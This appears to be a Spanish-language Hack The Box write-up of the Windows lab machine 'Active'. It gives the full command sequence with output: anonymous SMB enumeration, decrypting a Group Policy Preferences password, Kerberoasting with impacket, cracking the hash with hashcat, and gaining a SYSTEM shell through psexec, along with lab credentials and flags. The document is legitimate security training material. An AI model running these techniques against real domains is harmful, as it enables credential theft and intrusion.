Entrada

Active

Active

Active Windows · Easy

Task 1

How many SMB shares are shared by the target?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(pmartinezr㉿kali)-[~]
└─$ smbclient -L 10.129.22.254
Password for [WORKGROUP\pmartinezr]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.22.254 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

7

Task 2

What is the name of the share that allows anonymous read access?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(pmartinezr㉿kali)-[~]
└─$ smbmap -H 10.129.10.21    

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...                                                                                               [|] Checking for open ports...                                                                                               [*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.129.10.21:445        Name: 10.129.10.21              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS
[*] Closed 1 connections                                                                                                     
                          

smbmap es muy útil para agilizar estos descubrimientos.

Replication

Task 3

Which file has encrypted account credentials in it?

1
2
3
4
5
6
7
8
9
10
┌──(pmartinezr㉿kali)-[~]
└─$ smbclient '\\10.129.25.119\Replication' -N -c 'prompt OFF;recurse ON;mget *'   
Anonymous login successful
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.5 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (16.3 KiloBytes/sec) (average 3.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (3.0 KiloBytes/sec) (average 3.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.1 KiloBytes/sec) (average 3.2 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (8.0 KiloBytes/sec) (average 4.4 KiloBytes/sec)

Me decargo todo lo que se encuentra en Replication

1
2
3
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Encuentro un archivo Groups.xml que contiene unas credenciales

Groups.xml

Task 4

What is the decrpyted password for the SVC_TGS account?

1
2
3
┌──(pmartinezr㉿kali)-[~/htb/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

https://github.com/t0thkr1s/gpp-decrypt

Las Preferencias de Directiva de Grupo (GPP) se introdujeron en Windows Server 2008 y permiten a los administradores establecer contraseñas de dominio mediante la Directiva de Grupo. Sin embargo, las contraseñas se cifran con una clave AES-256 pública, lo que facilita su descifrado.

GPPstillStandingStrong2k18

Submit User Flag

Submit the flag located on the security user’s desktop.

1
2
3
┌──(pmartinezr㉿kali)-[~]
└─$ smbclient -N //10.129.25.119 svc_tgs --password=GPPstillStandingStrong2k18
smb: \SVC_TGS\Desktop\> get user.txt

Nos descargamos la flag.

28211704bc1468fab8d57d668204aa18

Task 6

Which service account on Active is vulnerable to Kerberoasting?

1
2
3
4
5
6
7
8
9
10
11
┌──(pmartinezr㉿kali)-[~/htb/active]
└─$ impacket-GetUserSPNs -dc-ip 10.129.25.119 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request    
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2025-12-26 19:49:46.822943             


[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$97efad5df18a89934465befde62403d1$c316d3dce9957e5bb7edbad6ffc4525d03252160613a0703d631d49f97571c1d4c250bd38cd2f73bfa02699cf1a2a70eb254000a58deb0bb03583ec78d51f55f6ed38e1beed791d7d6a02594c77a23abfe61c5ff92384b6364ec03aa83b662be60a35d8a79d5f6389201f19fb6473a817118036169314bb8daba417890e3d593357111a8f2841b3cc71c9d77c556368f0593a223fdd3c6c807fae4a3080017d0c575b66cdf8559dd55ea0805e727f89300af88e4448ae45acc86a88e1d9aeb7359547fbc82a4a4aae949997a4acb061cd158e019c8da0418b398aaaf948dd0692f2248507db7d63260bb4b70861750340df62e7dcaa83e84aadc35d36ad65967e45c9506e5dff79d2b35064a0601c2549b7a7255d332102b229abf209bbed89e255e53a8528729c46ea49399c586ad4f16bb1eff5bce50bd98eeaf62cf7cdd9e80ef60240a51c634fbdfbfac97387e31e923f10a7959a5cc4d10d8ffbb6528eeae92e4b5d7c55cec269e92b3443abb59b2d54c6393d03525c48e5af9733532da567b7e326b2b7d285f8ab3f86fac4b110eee4e8c99f6440596f476643b850430242102eac5aeadd53788e13780d5024653853ae493c1be15ac2dd5877705a4e752ad8b76bd7a53592e828a9fe5c091dd8ec793e2780a5a680c8249151d79ddfad9a0be47fccb9958238a77677d1d35ba0a6f82739ee3bf98b266ef56f007738926865bf1eb565fd892505ee4830b05c12293e50844331195ad16ada912553b8dbbfa321e7c44a9c28788dc7cfa5cf1894ccf736c9288d8c9730d4f5e5297a777e3b5483c9f94af900877104780268237992893b00a6d11cca65f4f885d18a491b93788a4fd66e3cc46b801a8d6aad373afd2f0aa8ef679aa6b2b7525d5a710017f9ff58627ad41a8d8b6f9fcc864bda7f1c71dcf80a15d080e8d3f61ead0339006215b10a486c2ce2739f9510638993aff81ec3590975a40e2bd92f1c4036b4e226000631677507cb46017bc44b7ebcccb8d7922eac75845135d97c52d2b98c9adedaebaedffe6e420065395fcb279e37b486cabe36167fe68a0483072524040dd3a99cd49c89a6084e62d6ff90fe23e431e4c89e65d4b8b103d7b78635499560376c5c23a87ba404ce1ab499196506d492727a642df83b93b007eb13e019aef1e706ffdbbd58212922032f4534f39ff102e0494d82c326cf29e65d2b708b5f88a9933dceabab8bbb256a40c6d6025bb8739361b07ed43816501

La utilidad impacket-GetUserSPNs sirve para explotar configuraciones inseguras de SPNs en dominios de Active Directory

Administrator

Task 7

What is the plaintext password for the administrator account?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(pmartinezr㉿kali)-[~/htb/active]
└─$ hashcat -m 13100 hash_administrator /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-bdver1-AMD FX(tm)-4300 Quad-Core Processor, 1469/2939 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory allocated for this attack: 512 MB (934 MB free)

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$97efad5df18a89934465befde62403d1$c316d3dce9957e5bb7edbad6ffc4525d03252160613a0703d631d49f97571c1d4c250bd38cd2f73bfa02699cf1a2a70eb254000a58deb0bb03583ec78d51f55f6ed38e1beed791d7d6a02594c77a23abfe61c5ff92384b6364ec03aa83b662be60a35d8a79d5f6389201f19fb6473a817118036169314bb8daba417890e3d593357111a8f2841b3cc71c9d77c556368f0593a223fdd3c6c807fae4a3080017d0c575b66cdf8559dd55ea0805e727f89300af88e4448ae45acc86a88e1d9aeb7359547fbc82a4a4aae949997a4acb061cd158e019c8da0418b398aaaf948dd0692f2248507db7d63260bb4b70861750340df62e7dcaa83e84aadc35d36ad65967e45c9506e5dff79d2b35064a0601c2549b7a7255d332102b229abf209bbed89e255e53a8528729c46ea49399c586ad4f16bb1eff5bce50bd98eeaf62cf7cdd9e80ef60240a51c634fbdfbfac97387e31e923f10a7959a5cc4d10d8ffbb6528eeae92e4b5d7c55cec269e92b3443abb59b2d54c6393d03525c48e5af9733532da567b7e326b2b7d285f8ab3f86fac4b110eee4e8c99f6440596f476643b850430242102eac5aeadd53788e13780d5024653853ae493c1be15ac2dd5877705a4e752ad8b76bd7a53592e828a9fe5c091dd8ec793e2780a5a680c8249151d79ddfad9a0be47fccb9958238a77677d1d35ba0a6f82739ee3bf98b266ef56f007738926865bf1eb565fd892505ee4830b05c12293e50844331195ad16ada912553b8dbbfa321e7c44a9c28788dc7cfa5cf1894ccf736c9288d8c9730d4f5e5297a777e3b5483c9f94af900877104780268237992893b00a6d11cca65f4f885d18a491b93788a4fd66e3cc46b801a8d6aad373afd2f0aa8ef679aa6b2b7525d5a710017f9ff58627ad41a8d8b6f9fcc864bda7f1c71dcf80a15d080e8d3f61ead0339006215b10a486c2ce2739f9510638993aff81ec3590975a40e2bd92f1c4036b4e226000631677507cb46017bc44b7ebcccb8d7922eac75845135d97c52d2b98c9adedaebaedffe6e420065395fcb279e37b486cabe36167fe68a0483072524040dd3a99cd49c89a6084e62d6ff90fe23e431e4c89e65d4b8b103d7b78635499560376c5c23a87ba404ce1ab499196506d492727a642df83b93b007eb13e019aef1e706ffdbbd58212922032f4534f39ff102e0494d82c326cf29e65d2b708b5f88a9933dceabab8bbb256a40c6d6025bb8739361b07ed43816501:Ticketmaster1968

Ticketmaster1968

Submit Root Flag

Submit the flag located on the administrator’s desktop.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(pmartinezr㉿kali)-[~/htb/active]
└─$ impacket-psexec 'administrator:Ticketmaster1968@10.129.25.119'                                     
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.129.25.119.....
[*] Found writable share ADMIN$
[*] Uploading file JMSZAmcU.exe
[*] Opening SVCManager on 10.129.25.119.....
[*] Creating service dBTZ on 10.129.25.119.....
[*] Starting service dBTZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

c:\Users\Administrator\Desktop> type root.txt
5fcd71baf69ff5e3940942645f039068

5fcd71baf69ff5e3940942645f039068

achivement

Esta entrada está licenciada bajo CC BY 4.0 por el autor.